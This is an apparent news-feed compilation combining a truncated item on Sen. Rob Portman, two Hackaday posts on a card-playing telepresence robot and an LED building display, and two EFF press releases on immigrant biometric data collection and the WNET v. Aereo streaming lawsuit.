He had received a phone call just that morning from a supporter furious about yet another newspaper story suggesting that he was boring. It was not the best of days for Sen. Rob Portman of Ohio, a man thought to be on Mitt Romney’s list of possible running mates. “I told my staff that I’m [...]

hackadayTelepresence robot lets you play a hand of cards

Virtual card games proliferate the interwebs, but this card-playing telepresence device is unique. [Patrick] calls the project Vanna, and we’d bet that’s an homage to the tile-flipping TV star [Vanna White]. Much like she flips the blank tiles to reveal letters, this device can flip the hand of cards either face up or face down.

Each of the six card trays is connected to a stepper motor. The local player deals the hands, placing each card in a tray so that it faces the webcam for the remote player. That remote player has an on-screen interface that can discard by tilting the tray forward and dropping the card on its face, or play a card by tilting toward to the local player so they can see its face value. All becomes clear in the clip after the break.

The hardware is USB controlled from a Windows machine thanks to the PIC 18F4585 which controls it. But it should be quite simple to get it talking to the OS of your choice.


Filed under: robots hacks


hackadayPower Index Window Display turns buildings into LED matrices

What started off as a fun project using light bulbs picked up some sponsorship and is going on tour. This project now uses LED modules controlled on the 2.4 GHz band to turn buildings into full color displays. It’s the product of students at Wrocław University of Technology in Poland. The group is something of an extra-curricular club that has been doing this sort of thing for years. But now they’ve picked up some key sponsorships which not only allowed for upgraded hardware, but sent the group on a tour of Universities around Europe. Who would’ve thought you could go on tour with something like this?

Much like the MIT project we looked at in April, this lights up the dark rooms of a grid-like building. It does go well beyond playing Tetris though. The installation sets animations to music, with a custom animation editor so that you can submit your own wares for the next show. Don’t miss the lengthy performance after the break.

[Thanks Sándor]


Filed under: led hacks


EFF deeplinksFrom Fingerprints to DNA: Biometric Data Collection in U.S. Immigrant Communities and Beyond

New White Paper from EFF and the Immigration Policy Center Outlines Privacy and Security Concerns

San Francisco - Today the Immigration Policy Center (IPC) and the Electronic Frontier Foundation (EFF) release "From Fingerprints to DNA: Biometric Data Collection in U.S. Immigrant Communities and Beyond." The paper outlines the current state of U.S. government collection of biometric information and the problems that could arise from these growing databases of records. It also points out how immigrant communities are immediately affected by the way this data is collected, stored, and shared.

There is a growing push to link biometric collection with immigration enforcement. The U.S. Department of Homeland Security (DHS) takes approximately 300,000 fingerprints per day from non-U.S. citizens crossing the border into the United States, and it collects biometrics from noncitizens applying for immigration benefits and from immigrants who have been detained. In addition, state and local law enforcement officers regularly collect fingerprints and DNA, as well as face prints and even iris scans. All of these government databases are growing and are being increasingly interconnected. For example, the Secure Communities program takes the fingerprints of people booked into local jails, matches them to prints contained in large federal immigration databases, and then uses this information to deport people.

"Some people believe biometrics and databases are the silver-bullets that will solve the immigrant enforcement dilemma. But biometrics are not infallible, and databases contain errors. These problems can result in huge negative consequences for U.S. citizens and legal immigrants mistakenly identified," said Michele Waslin, Senior Policy Analyst at the IPC.

"Biometric data collection can lead to racial profiling and can disproportionately affect immigrants," said EFF Staff Attorney Jennifer Lynch. "It also gives the government a new way to find and track people throughout the United States. The government needs to act now to limit unnecessary biometric collection and address the serious privacy issues regarding the amount and type of data collected, as well as what triggers that data collection, with whom the data is shared, and the security of that data."

For the full white paper "From Fingerprints to DNA: Biometric Data Collection in U.S. Immigrant Communities":
https://www.eff.org/document/fingerprints-dna-biometric-data-collection-us-immigrant-communities-and-beyond

For "From Fingerprints to DNA: By the Numbers":
https://www.eff.org/document/fingerprints-dna-numbers

For more on biometrics:
https://www.eff.org/issues/biometrics

Contacts:

Jennifer Lynch
   Staff Attorney
   Electronic Frontier Foundation
   jlynch@eff.org

EFF deeplinksTV Networks Try to Squash New York City Streaming Service

Bogus Copyright Infringement Claims Could Add Up to Fewer Choices, Higher Prices

New York - The Electronic Frontier Foundation (EFF) is urging a federal judge not to let television networks squash an innovative streaming service with a bogus copyright infringement lawsuit.

In an amicus brief filed today, EFF and Public Knowledge asked the court to block a preliminary injunction that could prevent Aereo Inc. from establishing a customer base in New York City, arguing that shutting down the service at this early stage sends a dangerous message to other start-up companies working to improve consumers' TV viewing experience.

"The threat of lengthy litigation would discourage any business from working to add value to the television viewing experience, leaving the market in the hands of a few established players," said EFF Staff Attorney Mitch Stoltz. "Remember, these are the same folks who tried to keep VCRs off the market years ago, and more recently fought viciously against remote DVRs, which allow cable subscribers access to content they've already bought but is stored elsewhere. This is yet another attempt by TV networks to profit from, control, or stop new technology they didn't think of first."

Aereo lets users in New York watch local channels by renting their own small antenna located at the Aereo facility, with the signal from the antenna sent over the Internet to that single user. The TV networks argue that this somehow constitutes a public performance and therefore infringes their copyright, even though it would be perfectly legal for someone to install their own antenna and run a wire to a TV set without paying a fee to anyone.

"All Aereo is doing, conceptually, is moving the rabbit ears from your roof to theirs," said EFF Senior Staff Attorney Kurt Opsahl. "Yet the TV networks want to play games with the law to get a cut of the profits or shut it down. We're asking the court to consider the legal and customary rights of television viewers, as well as the threats a preliminary injunction could bring to future innovation."

For the full brief in WNET v. Aereo Inc.:
https://www.eff.org/node/70851

Contacts:

Mitch Stoltz
   Staff Attorney
   Electronic Frontier Foundation
   mitch@eff.org

Kurt Opsahl
   Senior Staff Attorney
   Electronic Frontier Foundation
   kurt@eff.org